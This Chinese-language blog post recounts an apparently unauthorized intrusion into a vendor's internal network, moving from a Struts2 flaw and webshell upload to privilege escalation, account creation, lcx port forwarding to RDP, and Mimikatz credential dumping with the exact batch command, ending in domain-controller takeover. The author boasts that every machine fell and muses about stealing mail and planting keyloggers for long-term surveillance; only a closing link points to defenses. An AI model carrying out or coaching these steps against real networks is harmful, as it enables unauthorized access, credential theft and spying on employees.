前阵子漏洞银行官方群岩少他们在吹水,说在撸某某厂商的域控。后来才知道连Webshell都还没到手。


根据他们聊到的“**”关键字,当时正在接收漏洞就只有俩。找岩少确定了一下是同一个厂商就开始撸。漏洞并未提交。原因是停止接收了。


通过两小时的缜密检查,发现了多个漏洞和风险可深入内网。其中包括sql注入、iis文件写入、3306可爆破等等


懒得写那些了,又不是提交漏洞。

用一个struts st2漏洞作为突破口。

这个网站的管理员&运维虽然很逗逼,但是这里做的不错。

【内网案例】内网漫游某厂商

本想直接执行命令get服务器,ipconfig有权限。net无回显,tasklist看了一下进程,排查到一个不知名的杀软。


通过文件管理找到根目录,很有意思。上传jsp等大马会访问不了,我自己把这俗称访问限制。管理员把目录做了限制,需要带有cookie来访问。如果非登录状态就会跳转回后台登录页面。    

遇到这种情况的解决办法

1.我之前提到这个站还有其他漏洞,如果你能通过sql注入或其他漏洞找出账号密码,那么在st2内写入马儿以后,通过账号密码登录后台带状态去访问大马(这个场景限制比较高。)

2.换目录,可能只是根目录做了限制。

3.通过菜刀马来深入

【内网案例】内网漫游某厂商

不过在nginx环境下,目录访问限制很少见的 ,一般直接403禁止脚本执行。在apache的环境中碰到的几率比较高。

各种提权无果,杀软还是有点用的,某exp成功秒杀。建立账户,然而内网。

lcx内网转发

在理论上只要是连着网的我们都可以访问的,但在局域网(内网)中只开放了web服务,该服务外网的用户无法“直接”访问

因此我们需要端口映射等操作来进行访问,端口映射在内网渗透时是常用到的。特别想要登录远程的服务端时。

我们需要找一台具有外网IP的计算机来访问,我自己的计算机是内网,因此我先连接一台外网服务器作为媒介。


对需要内网渗透的网站上传一个lcx并执行lcx.exe -slave 你的外网IP 端口 127.0.0.1 3389

具体请谷歌。这里不班门弄斧了。

进入内网

【内网案例】内网漫游某厂商

很小众的杀软,退出这个杀软需要密码。没有时间了,大白天的在内网转悠是不容许耽误时间的。当然,在必要的情况下还是需要想办法处理杀软,我这里使用Mimikatz等工具的时候并没有对我拦截之类的,故此无视杀软


Mimikatz的下载链接

https://github.com/gentilkiwi/mimikatz/releases/download/2.1.0-alpha-20160702/mimikatz_trunk.zip

大致是通过Windows自带的函数进行权限提升。然后获取lsass.exe进程句柄、根据不同版本赋值两个偏移量。可以看出支持xp和2003,之后版本vista、win7等使用同一偏移量。找到lsasrv.dll的LsaUnprotectMemory 函数然后该函数用于解密LsaProtectMemory的加密内存。首先加载wdigest.dll模块,然后获取SpInstanceInit的地址,然后在SpInstanceInit查找DES的密钥,通过LsaEnumerateLogonSessions() 获取活动Session的LUID等等。。

总的来说在Windows XP中,Microsoft增加了对“WDigest”协议的支持。该协议基于RFC 2617和2831。客户端用该协议向HTTP和SASL应用发送明文凭证,Windows会将密码缓存在内存中,便于用户登录本地工作站。然后Mimikatz逆出lsass.exe内的用户密码。

关于更多的代码和原理这里就不班门弄斧了,谷歌一下更加详细。

攻击流程

在mimikatz.exe目录新建个LOOK_PassWord.bat

文件内容如下:

mimikatz privilege::debug sekurlsa::logonpasswords >> test.txt exit

然后直接以管理员权限运行LOOK_PassWord.bat。

生成test.txt

test.txt里边就有Windows的明文密码。

通过抓取的明文密码,直接秒下域控等。通用密码害死人。

【内网案例】内网漫游某厂商

至此,内网全部机器沦陷,全国信息唾手可得。管理员的自我保护意识太差劲,也许通过我的社工库和抓取的密码还可以进入更多的邮箱等窃取更多的资料,并且长期进行监控。更可怕的是还可以使用社会工程学和一些免杀远控、键盘记录等来达到监控公司内部工作人员的计算机,这是非常可怕的。


如何防御Mimikatz

http://www.freebuf.com/sectool/96209.html

虽然我比他写的更加详细,但是结果是一样的。懒得传图了,凑合看吧。